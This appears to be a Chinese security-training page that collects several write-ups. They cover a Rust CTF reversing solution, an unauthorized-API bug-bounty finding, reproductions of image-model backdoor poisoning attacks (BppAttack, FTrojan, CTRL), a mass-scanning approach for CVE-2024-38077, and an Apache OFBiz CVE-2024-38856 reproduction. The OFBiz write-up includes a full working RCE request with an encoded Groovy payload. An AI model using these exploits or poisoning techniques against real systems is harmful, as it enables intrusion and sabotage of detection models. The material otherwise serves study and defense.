蚁景网安 - 网络安全人才培养服务提供商

实战逆向RUST语言程序

实战为主，近日2024年羊城杯出了一道Rust编写的题目，这里将会以此题目为例，演示Rust逆向该如何去做。题目名称：sedRust_happyVm 题目内容：unhappy rust, happy vm 关于Rust逆向，其实就是看汇编，考验选手的基础逆向能力。在汇编代码面前，任何干扰都会成为摆设。 1、初步分析 64为程序，使用IDA 64打开通过字符串定位分析点现在我们知道 inputflag的长度大于 0x15 接下来在汇编层面下一个断点，输入假flag，去观察相关寄存器的值好像并没有什么内容继续单步步过，直到发现下一个要注意的地方！字符串长度：0x28 我们继续单步步过跟踪开辟空间的时候，说明快到真正函数处理过程了。 2、分析加密流程 2.1 base64分割模块这里简单将 3 字节变成4字节的操作，称之为 base64分割模块这里举个例子输入的："111" ->二进制字符串 001100010011000100110001 经过base64分割模块 ->001100 010011 000100 110001 发现程序执行完后正好是这样的结果 2.2 组合举个例子：假如分割之后的4字节为： 0xC、0x13、0x4、0x31 那么组合后的字符串 rax = 0xC rcx = 0x1300 edx = 0xB1130C18 2.3 VM处理模块发现func3 非常乱并且频繁调用sub_40A800() 发现这是一道VM类型的题，那么VM的题加密应该会很简单，基本是异或之类。在 sub_40A800 里面找到异或，下断点这个al每经过两次就是秘钥解题脚本 int main() { //提取的密文 unsigned char s1[] = { 0x00,0x82,0x11,0x92,0xa8,0x39,0x82,0x28,0x9a,0x61,0x58,0x8b,0xa2,0x43,0x68,0x89,0x4,0x8f,0xb0,0x43,0x49,0x3a,0x18,0x39,0x72,0xc,0xba,0x76,0x98,0x13,0x8b,0x46,0x33,0x2b,0x25,0xa2,0x8b,0x27,0xb7,0x61,0x7c,0x3f,0x58 }; //提取的秘钥 unsigned char s2[] = { 0x18,0xb1,0x9,0xa4,0xa6,0x2a,0x9e,0x1b,0x96,0x57,0x5d,0xad,0xae,0x75,0x65,0xac,0x9,0x8c,0xa0,0x76,0x47,0x2c,0x10,0x1,0x7c,0xf,0xba,0x47,0x95,0x30,0x9b,0x74,0x3f,0x2d,0x2d,0x9a,0x87,0x31,0xba,0x43,0x70,0x2c,0x4c }; unsigned char s3[128] = { 0 }; for (int i = 0; i < 43; i++) { s3[i] = s1[i] ^ s2[i]; } //还原base64分割模块 char s4[128] = { 0 }; int j = 0; for (int i = 0; i < 44; i += 4, j += 3) { s4[j] = (s3[i] << 2) | (s3[i + 1] >> 4); s4[j+1] = (s3[i+1] << 4) | (s3[i + 2] >> 2); s4[j+2] = (s3[i+2] << 6) | s3[i + 3]; } printf("%s", s4); return 0; } ‍

小白生于天地之间，岂能郁郁难挖高危？

小白的众测高危：记先前某次众测，经过资产梳理，发现所有站点全部都挂了WAF，作为一名不钓鱼的挖洞小白，我估计这次又要空军。小白生于天地之间，岂能郁郁难挖高危？想要在挂了WAF的站点挖出高危，很难，因为这些站点，你但凡鼠标点快点，检测出了不正确动作都要给你禁IP，至于WAF绕过对于小白更是难搞。其实在众测，大部分漏洞都并非那些什么SQL注入RCE等等，而小白想要出高危，可能也只有寄托希望于未授权。未授权接口怎么找：有一种站点，在URL内含有#符号，这种站点的路径接口信息泄露较多，更容易出未授权。但要注意一点，#后面的东西是不会走服务器的，所以这里如果在findsomething找到了很多东西，拼接的时候带不带#号呢？这就要区分路由和接口了，如果看着像是路由，在这种原本就有#符号站点，就带上#符号。如果是接口，接口一般是用来进行数据交互的，所以需要走服务器，那就不能拼接#符号。区分上述后就可以将拿到的东西以POST请求，GET请求都跑一遍，再看是否存在能用的接口，再根据接口返回情况看是否需要添加参数。这里又是涉及一个很麻烦的点，那就是遇到接口能用，找到参数了，但参数的格式不知道，我这次讲的这个高危就遇到了这种情况，差点错过！在将现有js里面的接口跑完后还需要注意找js里面的js里面的接口。这里有两种常见情况：一、js.map泄露大多webpack打包的站点会有js.map文件，那js.map文件怎么利用呢？首先需要下载下来：如上图，右键检查后，在网络处找.js文件，再点击它，在右方找到js文件的路径，并在结尾加上.map访问即可下载。之后再由reverse-sourcemap工具还原js.map文件，再由vscode等工具打开，进行接口关键字搜查。二、大量chunk类型js泄露：如图：我们如果在数据包或者js文件看到这种格式内容，就可以考虑进一步利用。首先将所有内容复制出来，再用notepad++打开：如图进行替换成符合burp里面chunk文件的格式，再放到burp里面跑一遍，配合HAE插件可以提取更加全面的接口信息。小白找的高危未授权接口：我也是通过上述方法找到接口后放到burp里面跑，（跑的时候记得加参数），例如接口中有类似id=，url=，wid=等等最好自己加个参数上去。但就是因为不知道参数类型，我险些错过这个高危漏洞。如上图第一个接口，因为参数不正确跑出来跟其它接口一个样，不过还好我留意了一下，并且运气好，随手拼的参数居然正确了，直接下载了敏感文件，造成用户全家姓名，电话，住址，工作公司，身份证等等信息全部泄露。（所以这里注意：对有参数的接口即使一次没跑出信息，也要考虑是否需要对参数进行FUZZ）并且id参数可遍历，形成大范围用户泄露，高危漏洞到手。

深度学习后门攻击分析与实现（二）

前言在本系列的第一部分中，我们已经掌握了深度学习中的后门攻击的特点以及基础的攻击方式，现在我们在第二部分中首先来学习深度学习后门攻击在传统网络空间安全中的应用。然后再来分析与实现一些颇具特点的深度学习后门攻击方式。深度学习与网络空间安全的交叉深度学习作为人工智能的一部分，在许多领域中取得了显著的进展。然而，随着其广泛应用，深度学习模型的安全性也引起了广泛关注。后门攻击就是其中一种重要的威胁，尤其在网络空间安全领域中。我们已经知道深度学习后门攻击是一种攻击者通过在训练过程中插入恶意行为，使得模型在特定的触发条件下表现异常的攻击方式。具体来说，攻击者在训练数据集中加入带有后门触发器的样本，使得模型在遇到类似的触发器时，产生攻击者期望的错误输出，而在正常情况下，模型仍能表现出高准确率。这种隐蔽性和针对性使得后门攻击非常难以检测和防御。现在我们举几个例子介绍后门攻击在网络空间安全中的应用场景。恶意软件检测：在网络安全中，恶意软件检测是一个重要应用。攻击者可以通过后门攻击技术，使得恶意软件检测模型在检测特定样本时失效。例如，攻击者可以在训练恶意软件检测模型时插入带有后门的恶意样本，使得模型在检测带有特定触发器的恶意软件时无法正确识别，从而达到隐蔽恶意软件的目的。入侵检测系统：入侵检测系统（Intrusion Detection System, IDS）用于监测网络流量并识别潜在的入侵行为。攻击者可以在训练IDS模型时加入后门触发器，使得模型在特定条件下无法识别攻击流量。例如，攻击者可以在训练数据中插入带有特定模式的正常流量，使得模型在检测到这些模式时误判为正常，从而绕过入侵检测系统。图像识别安全：在网络空间安全中，图像识别技术被广泛应用于身份验证和监控系统中。攻击者可以利用后门攻击，在训练图像识别模型时插入带有后门的图像样本，使得模型在识别带有特定触发器的图像时出现误判。例如，攻击者可以使得带有特定标志的非法图像被识别为合法，从而绕过安全监控系统。可见后门攻击与网络空间安全其他领域还是存在不少交叉的。现在我们继续来分析并实现、复现典型的深度学习后门攻击方法。 BppAttack 理论这篇工作提出了一种名为BPPATTACK的深度神经网络（DNN）木马攻击方法。该攻击利用了人类视觉系统对图像量化和抖动处理不敏感的特性，通过这些技术生成难以被人类察觉的触发器，进而实现对DNN的高效、隐蔽的木马攻击。现有的攻击使用可见模式（如图像补丁或图像变换）作为触发器，这些触发器容易受到人类检查的影响。比如下图就可以看到很明显的触发器。 BPPATTACK方案的核心思想是利用人类视觉系统对图像微小变化的不敏感性，通过图像量化和抖动技术生成难以被人类察觉的触发器，实现对深度神经网络（DNN）的高效、隐蔽的木马攻击。人类视觉系统对颜色深度的变化不是特别敏感，特别是当颜色变化非常微小的时候。BPPATTACK正是基于这一生物学原理，通过调整图像的颜色深度来生成触发器。图像量化（Bit-Per-Pixel Reduction）：图像量化是减少图像中每种颜色的比特数，从而减少图像的总颜色数量。BPPATTACK通过降低每个像素的比特深度，使用量化后的最近邻颜色值来替换原始颜色值，实现对图像的微小修改。抖动技术（Dithering）：为了消除由于颜色量化引起的不自然或明显的图像伪影，BPPATTACK采用抖动技术，特别是Floyd-Steinberg抖动算法，来平滑颜色过渡，提高图像的自然度和视觉质量。 BPPATTACK旨在生成一种触发器，它对人类观察者来说是几乎不可察觉的，但对机器学习模型来说足够显著，能够触发预设的木马行为。这种平衡是通过精确控制量化和抖动的程度来实现的。与需要训练额外的图像变换模型或自编码器的攻击不同，BPPATTACK不需要训练任何辅助模型，这简化了攻击流程并提高了效率。为了提高攻击的成功率和隐蔽性，BPPATTACK采用了对比学习和对抗性训练的结合。通过这种方式，模型被训练来识别和利用量化和抖动生成的触发器，同时忽略其他不重要的特征。量化过程涉及将原始图像的颜色深度从( m )位减少到( d )位（( d < m )）。对于每个像素值，使用以下公式进行量化：其中： ( T(x) ) 是量化后的像素值。 ( x ) 是原始像素值。 ( m ) 是原始颜色深度的位数（每个通道）。 ( d ) 是量化后的目标颜色深度的位数。 ( \text{round} ) 是四舍五入到最近的整数。 Floyd-Steinberg Dithering:抖动算法用于改善量化后的图像质量，通过将量化误差扩散到邻近像素。对于每个像素，计算量化误差并更新周围像素：然后，根据Floyd-Steinberg分布，更新当前像素和周围像素： BPPATTACK方案的关键在于通过量化和抖动技术生成的微小变化对人类视觉系统是不可见的，但对DNN模型是可区分的，从而实现隐蔽的木马攻击。实现我们来看看该方法得到的部分中毒样本分析关键函数 Bpp 类：继承自 BadNet，添加了命令行参数处理和数据集准备功能，用于特定处理阶段。 set_bd_args 方法：配置与攻击设置相关的命令行参数。 stage1_non_training_data_prepare 方法：准备和变换数据集，设置 DataLoader，并存储阶段 1 的结果。 1. 类定义与初始化类声明： class Bpp(BadNet): Bpp 是 BadNet 的一个子类。构造函数 (__init__ 方法)： def __init__(self):: 这是 Bpp 的初始化方法。 super(Bpp, self).__init__(): 调用父类 BadNet 的构造函数，以确保执行父类中的初始化逻辑。 2. 设置命令行参数 set_bd_args 方法： def set_bd_args(cls, parser: argparse.ArgumentParser) -> argparse.ArgumentParser:: 这个类方法用于使用 argparse 库设置命令行参数。 parser = add_common_attack_args(parser): 调用 add_common_attack_args 函数，添加与攻击相关的常见参数。 parser.add_argument(...): 添加各种命令行参数： --bd_yaml_path: 指定一个 YAML 文件的路径，用于提供额外的默认属性。 --neg_ratio, --random_rotation, --random_crop, --squeeze_num, --dithering: 各种与攻击配置相关的参数，如负比率、旋转、裁剪、压缩和抖动。返回值：返回更新后的 parser 对象，其中包含所有添加的参数。 3. 准备第一阶段的数据 stage1_non_training_data_prepare 方法： def stage1_non_training_data_prepare(self):: 这个方法用于准备第一阶段的数据。日志记录与断言： logging.info("stage1 start"): 记录阶段 1 的开始。 assert "args" in self.__dict__: 确保 args 属性存在于实例中。数据集准备： train_dataset_without_transform, train_img_transform, train_label_transform, 等变量：这些变量被赋值为调用 self.benign_prepare() 的结果，该方法用于准备数据集和变换。 clean_train_dataset_with_transform.wrap_img_transform = test_img_transform: 将训练数据集的图像变换更新为与测试数据集的图像变换一致。 DataLoader 初始化： clean_train_dataloader: 一个用于清洁训练数据集的 DataLoader，应用了变换。 clean_train_dataloader_shuffled: 一个用于清洁训练数据集的 DataLoader，但数据是打乱的。 clean_test_dataloader: 一个用于清洁测试数据集的 DataLoader。存储结果： self.stage1_results: 存储各种数据集和 DataLoader 以备阶段 1 进一步使用。这段代码是一个神经网络训练和评估的流程，具体针对的是后门攻击（backdoor attack）的研究初始化：代码开始时，记录训练阶段2的开始时间。通过断言检查 self 对象中是否包含 args 属性，获取训练参数。设备选择：根据是否有可用的 GPU 来设置计算设备。如果 args.device 包含多个设备（例如 "cuda:2,3,7"），则使用 torch.nn.DataParallel 来并行计算。模型生成：调用 generate_cls_model 函数生成分类模型 netC，并将其移动到指定的设备上。优化器和学习率调度器：调用 argparser_opt_scheduler 函数获取优化器和学习率调度器。数据预处理：过滤出可逆的图像变换（如标准化、缩放、转换为张量）。创建干净和背门攻击的数据集，分别保存处理后的数据集。训练数据处理：遍历干净训练数据，通过反归一化得到原始图像。根据攻击标签转换类型（"all2one" 或 "all2all"）来生成背门攻击数据。处理数据集中的每一批次，并将干净样本和背门样本保存到数据集中。测试数据处理：对测试数据进行类似的预处理和保存操作，包括处理干净测试数据和背门测试数据。评估背门效果，并根据攻击标签转换类型生成相应的标签和数据。负样本生成：如果指定了负样本比率（neg_ratio），生成负样本数据。这些负样本用于评估背门攻击的效果。将负样本与其他数据合并，并保存处理后的数据。模型训练和评估：对每个 epoch 执行训练和评估步骤。记录训练损失、准确率、背门攻击成功率等指标。将每个 epoch 的训练和测试结果保存到列表中，并绘制训练和测试指标的图表。模型保存和结果输出：在训练周期结束时保存模型状态、学习率调度器状态、优化器状态等。将训练和测试结果保存到 CSV 文件中，并生成最终的攻击结果数据。完成：输出“done”表示训练和保存过程已完成。每个步骤都有明确的目标，从数据处理到模型训练，再到最终结果保存，涵盖了整个训练和评估的过程。这段代码包含了两个主要的函数：train_step 和 eval_step。它们分别用于训练和评估模型 train_step 函数功能: 执行一个训练步骤，处理数据、计算损失、更新模型权重，并计算各种指标。初始化: 记录日志，设置模型为训练模式。获取训练参数，包括背门比率（rate_bd）和压缩数（squeeze_num）。初始化交叉熵损失函数（criterion_CE）和数据转换对象（transforms）。初始化一些用于记录的列表。数据处理: 对每个批次的数据进行处理：清空优化器的梯度。将输入数据和目标标签移动到指定设备（GPU/CPU）。计算背门样本和负样本的数量。根据是否存在背门样本和负样本，生成相应的数据：背门样本: 对背门样本进行处理（如抖动处理）并生成标签。负样本: 生成负样本数据并合并到训练数据中。处理数据集中的每一批次，将背门样本和负样本合并到一起。应用数据转换函数。模型训练: 计算模型的预测结果，并记录计算时间。计算损失，进行反向传播，更新优化器。记录每个批次的损失、预测结果、标签等信息。计算指标: 计算每个 epoch 的平均损失和准确率。根据背门样本、负样本和干净样本的指标，计算背门攻击成功率（ASR）、干净样本准确率等。返回: 返回训练过程中的各种指标：平均损失、混合准确率、干净样本准确率、背门攻击成功率、背门样本恢复准确率、交叉样本准确率。 eval_step 函数功能: 执行模型评估，计算不同数据集（干净数据集、背门数据集、交叉数据集等）的损失和准确率。清洁测试数据集评估: 使用 given_dataloader_test 函数评估干净测试数据集，获取损失和准确率。背门数据集评估: 使用 given_dataloader_test 函数评估背门测试数据集，获取损失和准确率。背门样本恢复（RA）数据集评估: 对背门样本恢复数据集进行转换和评估，获取损失和准确率。交叉数据集评估: 使用 given_dataloader_test 函数评估交叉测试数据集，获取损失和准确率。返回: 返回不同数据集的损失和准确率：干净测试集损失和准确率、背门测试集损失和准确率、交叉测试集损失和准确率、恢复测试集损失和准确率。这些函数一起构成了一个完整的训练和评估流程，涵盖了数据处理、模型训练、指标计算和评估等多个方面。开始进行后门注入攻击配置如下所示训练期间的部分截图如下也可以查看acc的变化情况可以看到主要关注的指标都在稳步上升以35epoch为例，此时的后门攻击成功率达到了0.98，而深度学习模型执行正常任务的准确率达到了0.91 FTrojan 理论 FTrojan攻击的核心思想是在频率域中注入触发器。这种方法利用了两个关键直觉：在频率域中的小扰动对应于整个图像中分散的小像素级扰动，这使得图像在视觉上与原始图像难以区分。卷积神经网络（CNN）能够学习并记住频率域中的特征，即使输入的是空间域像素。 FTrojan攻击包括以下步骤：将图像从RGB色彩空间转换到YUV色彩空间，因为人的视觉系统对YUV中的UV（色度）分量不那么敏感。对图像的UV分量进行离散余弦变换（DCT），将其从空间域转换到频率域。在频率域中生成触发器，选择固定大小的频率带作为触发器。应用逆DCT将图像从频率域转换回空间域。最后，将图像从YUV色彩空间转换回RGB色彩空间。我们来分析关键细节 FTrojan攻击方法的核心在于利用频率域的特性来注入难以被检测到的后门触发器。颜色空间转换（RGB到YUV）：使用线性变换将RGB图像转换为YUV空间。YUV空间将颜色图像分解为亮度（Y）和色度（U, V）分量。人的视觉系统对色度分量的变化不如亮度分量敏感，因此在色度分量中注入触发器对视觉的影响较小。离散余弦变换（DCT）：对YUV空间中的U和V分量应用DCT，将图像从空间域转换到频率域。DCT将图像表示为不同频率的余弦函数的集合，能量集中在低频部分，高频部分则包含图像的边缘和细节信息。 DCT公式如下：其中，(X(u, v))是DCT系数，(x(x, y))是图像在空间域的像素值，(M)和(N)是图像的宽度和高度，(u)和(v)是频率索引。触发器生成：在频率域中选择特定的频率带作为触发器。触发器的频率和幅度是两个关键参数：触发器频率：选择中频和高频带的组合，以平衡人类视觉感知的敏感性和触发器的鲁棒性。触发器幅度：选择适中的幅度以确保触发器对CNN是可学习的，同时对人类视觉系统是不可见的。逆离散余弦变换（Inverse DCT）：使用逆DCT将修改后的频率域图像转换回空间域，得到注入了后门触发器的图像。逆DCT公式如下：颜色空间转换（YUV回到RGB）：最后，将修改后的YUV图像转换回RGB空间，因为大多数CNN模型是在RGB空间上训练的。完整的攻击流程如下图所示下图是本方法生成的中毒样本与触发器，可以看到是具有一定隐蔽性的下图是通过 FTrojan 攻击来得到的中毒图像。混频将触发器混合在中频和高频成分中。我们可以观察到，当触发器存在于具有适中幅度的高频和中频成分中时，中毒图像在视觉上很难被检测到。复现攻击类这段代码定义了一个 Ftrojann 类，继承自 BadNet。下面是代码的功能解释： set_bd_args 方法: 这个方法用于设置命令行参数。它接受一个 argparse.ArgumentParser 对象作为输入，并返回一个更新后的 ArgumentParser 对象。 add_common_attack_args(parser) 是一个函数调用，可能会向 parser 中添加一些通用的攻击相关参数。添加了多个特定参数： --channel_list：接收一个整数列表，代表频道列表。 --magnitude：接收一个浮点数，表示强度。 --YUV：接收一个布尔值，表示是否使用 YUV 格式。 --window_size：接收一个整数，表示窗口大小。 --pos_list：接收一个整数列表，表示位置列表。 --bd_yaml_path：接收一个字符串，指定 YAML 文件的路径，该文件提供附加的默认属性。默认路径是 ./config/attack/ftrojann/default.yaml。 add_bd_yaml_to_args 方法: 这个方法用于将 YAML 文件中的默认属性添加到 args 参数中，并进行一些额外的处理。从 args.bd_yaml_path 指定的路径读取 YAML 文件内容，解析为字典 mix_defaults。将 args 对象中非 None 的参数更新到 mix_defaults 中。将 args 对象的 __dict__ 属性（存储了所有参数）更新为合并后的字典。检查 pos_list 的长度是否为偶数，如果不是，抛出 ValueError。将 pos_list 转换为一对一对的元组列表，例如，将 [x1, y1, x2, y2] 转换为 [(x1, y1), (x2, y2)]。着重查看对于数据集的处理代码这个类的主要功能是处理带有后门攻击的图像数据集，支持图像和标签的预处理、状态恢复和复制。这段代码定义了一个名为 prepro_cls_DatasetBD_v2 的 PyTorch 数据集类。这个类扩展了 torch.utils.data.Dataset，用于处理带有后门攻击（backdoor attack）的数据集 __init__ 方法: 参数: full_dataset_without_transform: 原始数据集，没有应用任何变换。 poison_indicator: 一个可选的序列，表示哪些图像需要应用后门变换（使用 one-hot 编码）。默认为 None，如果没有提供，则初始化为全零的数组。 bd_image_pre_transform: 应用在图像上的后门变换函数。 bd_label_pre_transform: 应用在标签上的后门变换函数。 save_folder_path: 保存后门图像的文件夹路径。 mode: 当前模式，默认为 'attack'。操作: 初始化数据集和相关属性。检查 poison_indicator 的长度是否与数据集长度匹配。如果 poison_indicator 中的值大于等于 1，则调用 prepro_backdoor() 方法进行后门数据预处理。设置其他属性，如 getitem_all 和 getitem_all_switch，用于控制数据集的取值方式。 prepro_backdoor 方法: 对所有需要后门变换的样本进行处理。遍历数据集的所有索引，如果 poison_indicator 表示该样本需要变换，则应用图像和标签的变换，并调用 set_one_bd_sample() 方法保存变换后的样本。 set_one_bd_sample 方法: 将图像和标签变换后的样本保存到 bd_data_container 中。确保图像被转换为 PIL 图像格式（如果不是的话）。更新 poison_indicator，标记该样本为后门样本。 __len__ 方法: 返回数据集中样本的总数。 __getitem__ 方法: 根据索引获取样本。如果样本是干净的（poison_indicator 为 0），则从原始数据集中获取图像和标签。如果样本是后门的（poison_indicator 为 1），则从 bd_data_container 中获取图像和标签。根据 getitem_all 和 getitem_all_switch 的设置，返回不同格式的数据。 subset 方法: 根据给定的索引列表更新 original_index_array，从而选择数据集的子集。 retrieve_state 方法: 返回当前对象的状态，包括 bd_data_container、getitem_all、getitem_all_switch、original_index_array、poison_indicator 和 save_folder_path。 copy 方法: 创建一个 prepro_cls_DatasetBD_v2 的副本。深度复制当前对象的状态，并设置到新副本中。 set_state 方法: 根据提供的状态文件恢复对象的状态。包括恢复 bd_data_container 和其他属性。在我们的实现中得到的部分中毒样本如下所示注入后门攻击配置后门注入期间的部分截图如下所示以第38个epoch为例，此时的后门攻击成功率达到了接近100%，而正常任务的准确率达到了0.91 CTRL 理论之前我们提到的后门攻击都是通过监督学习的方式实现的，这一节我们来分析自监督学习后门攻击。自监督学习（SSL）是一种无需标签即可学习复杂数据高质量表示的机器学习范式。SSL在对抗性鲁棒性方面相较于监督学习有优势，但是否对其他类型的攻击（如后门攻击）同样具有鲁棒性尚未明确。 CTRL攻击通过在训练数据中掺入少量（≤1%）的投毒样本，这些样本对数据增强操作具有抗性，使得在推理阶段，任何含有特定触发器的输入都会被错误地分类到攻击者预定的类别。触发器 ( r ) 是一种在输入数据的频谱空间中的扰动，它对数据增强（如随机裁剪）不敏感。触发器的设计使其在视觉上几乎不可察觉，但在频域中具有特定的模式。假设攻击者可以访问到一小部分目标类别的输入样本集 ( \tilde{D} )。通过在这些样本上添加触发器 ( r ) 来生成投毒数据 ( D^* )。嵌入：将触发器 ( r ) 嵌入到输入 ( x ) 中，形成触发输入 ( x^* = x \oplus r )。这里 ( \oplus ) 表示触发器嵌入操作。激活：在推理时，攻击者可以调整触发器的幅度来激活后门，而不影响模型对清洁数据的分类性能。 SSL中的对比损失函数旨在最小化正样本对（相同输入的不同增强视图）之间的距离，同时最大化负样本对（不同输入）之间的距离。对比损失可以表示为：其中，( f ) 是编码器，( x_i ) 和 ( x_j ) 是正样本对，( y_{ij} ) 是指示器（如果 ( x_i ) 和 ( x_j ) 是正样本对，则为1，否则为0），( \tau ) 是温度参数。 CTRL攻击利用了SSL的表示不变性属性，即不同增强视图的同一输入应具有相似的表示。数学上，这可以表示为：这里，( x^* ) 是触发输入，( x^+ ) 是增强后的正样本，( r ) 是触发器，( \alpha ) 是混合权重。通过调整触发器的幅度，攻击者可以控制攻击的效果。完整的攻击流程如下图所示下图演示了触发器的生成流程复现分析关键代码 ctrl类的stage1_non_training_data_prepare` 方法负责准备背门攻击的数据，包括训练和测试数据集的生成。它先从干净数据中准备基础数据，然后生成背门样本，最后创建背门训练和测试数据集，并将结果保存以备后续使用。这一过程涵盖了从数据预处理到背门攻击数据的生成，并最终包装成适合训练和评估的格式。这段代码是一个名为 ctrl 的类的定义，它继承自 BadNet 类。主要功能是准备阶段1的数据，包括生成后门攻击数据和测试数据 1. set_bd_args 方法功能: 设置用于背门攻击的命令行参数。 bd_yaml_path: 指定 YAML 配置文件的路径。 use_dct: 布尔值，指示是否使用 DCT（离散余弦变换）。 use_yuv: 布尔值，指示是否使用 YUV（视频色彩空间）。 trigger_channels: 触发器的通道。 pos_list: 触发器的位置。 2. stage1_non_training_data_prepare 方法功能: 准备数据，包括清洁训练数据、背门训练数据和测试数据。初始化: 记录日志并确保 args 存在。从 benign_prepare 方法中获取不同的数据集和转换方法。生成背门数据集: 调用 bd_attack_img_trans_generate 和 bd_attack_label_trans_generate 方法生成背门数据集所需的图像和标签转换。使用 generate_poison_index_from_label_transform 方法生成训练数据中的背门样本索引。保存背门样本索引到文件。创建背门训练数据集: 使用 prepro_cls_DatasetBD_v2 方法生成背门训练数据集，并应用转换。创建数据集包装器 dataset_wrapper_with_transform。生成背门测试数据集: 使用 generate_poison_index_from_label_transform 方法生成测试数据中的背门样本索引。使用 prepro_cls_DatasetBD_v2 方法生成背门测试数据集，并应用转换。使用 subset 方法筛选测试数据集中的背门样本。保存结果: 将准备好的数据集保存到 self.stage1_results 中。执行攻击配置如下训练期间部分截图如下可以看到，CTRL在后门攻击成功率上稍低，比如在第59个epoch时，攻击成功率为0.93，正常任务准确率为0.93。

Kernel Stack栈溢出攻击及保护绕过

逆向中巧遇MISC图片隐藏

深度学习后门攻击分析与实现（一）

Apache OFBiz远程代码执行漏洞（CVE-2024-38856）

漏洞简介 Apache OFBiz 是一个开源的企业资源规划系统，提供了一整套企业管理解决方案，涵盖了许多领域，包括财务管理、供应链管理、客户关系管理、人力资源管理和电子商务等。Apache OFBiz 基于 Java 开发，采用灵活的架构和模块化设计，使其可以根据企业的需求进行定制和扩展，它具有强大的功能和可扩展性，适用于中小型企业和大型企业，帮助他们提高效率，降低成本，并实现业务流程的自动化和优化。Apache OFBiz 在处理 view 视图渲染的时候存在逻辑缺陷，未经身份验证的攻击者可通过构造特殊 URL 来覆盖最终的渲染视图，从而执行任意代码。影响版本 Apache OFBiz <\= 18.12.14 漏洞复现 https://github.com/apache/ofbiz-framework/releases/tag/release18.12.14下载代码链接 https://codeload.github.com/apache/ofbiz-framework/zip/refs/tags/release18.12.14 下载后利用 idea 打开并编译运行构造发送数据包 POST /webtools/control/main/ProgramExport HTTP/1.1 Host: 127.0.0.1:8443 Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 272 groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0063\u0061\u006c\u0063\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b 成功执行打开计算器的命令 \u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0063\u0061\u006c\u0063\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b 是 throw new Exception('calc'.execute().te 漏洞分析 applications\accounting\webapp\accounting\WEB-INF\web.xml org.apache.ofbiz.webapp.control.ControlServlet 会处理所有以/control/ 开头的路由 org.apache.ofbiz.webapp.control.ControlServlet#doPost doPost 方法转换为 doGet 请求 org.apache.ofbiz.webapp.control.ControlServlet#doGet 利用 RequestHandler 来处理请求 org.apache.ofbiz.webapp.control.RequestHandler#doRequest 在 RequestHandler#doRequest 中依次获取路由相关参数 org.apache.ofbiz.base.util.UtilHttp#getApplicationName org.apache.ofbiz.webapp.control.RequestHandler#getRequestUri org.apache.ofbiz.webapp.control.RequestHandler#getOverrideViewUri 依次获取到与路由相关的参数后，调用 resolveURI 返回路由对应的配置信息 org.apache.ofbiz.webapp.control.RequestHandler#resolveURI 这里对应的是 framework/webtools/webapp/webtools/WEB-INF/controller.xml 对应的 /webtools/control/main/ 不需要认证，所以可以继续向下执行通过success获取到返回值的数据赋值给successResponse,然后传递给nextRequestResponse else if ("view".equals(nextRequestResponse.type)) { if (Debug.verboseOn()) Debug.logVerbose("[RequestHandler.doRequest]: Response is a view." + showSessionId(request), module); // check for an override view, only used if "success" = eventReturn String viewName = (UtilValidate.isNotEmpty(overrideViewUri) && (eventReturn == null || "success".equals(eventReturn))) ? overrideViewUri : nextRequestResponse.value; renderView(viewName, requestMap.securityExternalView, request, response, saveName); } 在overrideViewUri 非空且 eventReturn 为 null 或 "success" 的情况下，将 viewName 设置为 overrideViewUri 。否则将 viewName 设置为 nextRequestResponse.value 。这里请求的路径为 /main/ProgramExport 造成 view 的解析冲突，会进入到 ProgramExport 这个业务中，renderView 方法会解析与ProgramExport对应的请求 framework/webtools/widget/EntityScreens.xml framework/webtools/groovyScripts/entity/ProgramExport.groovy

如何通过组合手段大批量探测CVE-2024-38077

背景近期正值多事之秋，hvv中有CVE-2024-38077专项漏洞演习，上级police也需要检查辖区内存在漏洞的资产，自己单位领导也收到了情报，在三方共振下这个大活儿落到了我的头上。Windows Server RDL的这个漏洞原理就不过多介绍，本文重点关注如何满足大批量探测的需求。问题 CVE-2024-38077自披露以来流传过几个poc工具，但使用过后留下的只有某某服的exe版本。可能出于保密原因，这个工具不支持的功能太多，本文就不一一列举，采用排除法自行脑补。支持的参数是指定某个IP或者某个IP段进行扫描，然后没了，就像这样：但是这样扫来扫去无法满足需求，遇到的几个典型问题就是：扫的为什么很慢？从外部导入IP怎么办？如何从大批量资产中筛选出有漏洞的？空间测绘探测辖区内或者某一地区的资产当然离不开空间测绘工具，fofa、鹰图、shaodan、zoomeye等著名的自然要尝试一遍，搜索的关键词首先是国内+3389和135端口+windows server操作系统，协议的话可以组合RDP/RDL，这样一来搜出的资产会多达几百万条，百万量级的数据处理起来对于我们这种小散户而言属于天方夜谭。况且这些空间测绘平台中有的甚至不支持非会员大数据量查询，像shaodan这样能够显示出来已经是仁慈的了：结果虽然搜索出来了，但是百万级的数据是拿不到的。一是不支持多端口筛选，二是不支持导出（非会员）。这里先解决第二个问题，如何导出搜索结果？突然想起了许久未用的空间测绘工具——kunyu（坤舆）。运行起来，进去执行搜索是这样：检查了好多遍，语法没问题。不明觉厉之际，联系了kunyu的作者@风起。询问才知道ZoomEye的普通账号权限已经不支持kunyu了。唉，只能厚着脸皮借来账号一用。然后就是重新初始化、配置输出目录、配置查询页数......这次导出的关键就在page参数上。kunyu默认的page是1，每次显示10条，即输出的Excel中有10条数据。如果设置为1000，则会显示10000条数据，导出的数据也就是10000条，但是这样一来查询效率会大大降低。经过测试，将page设置为100是较为合适的，也就是每次显示1000条。另外配合时间参数after、before以及区域参数city、subvisions将单次搜索总量控制在1000条以内，这样就可以不漏掉资产。最后经过一番折腾，搜索了60多次，合并多个文件后，终于生成了一份5万条左右的Excel....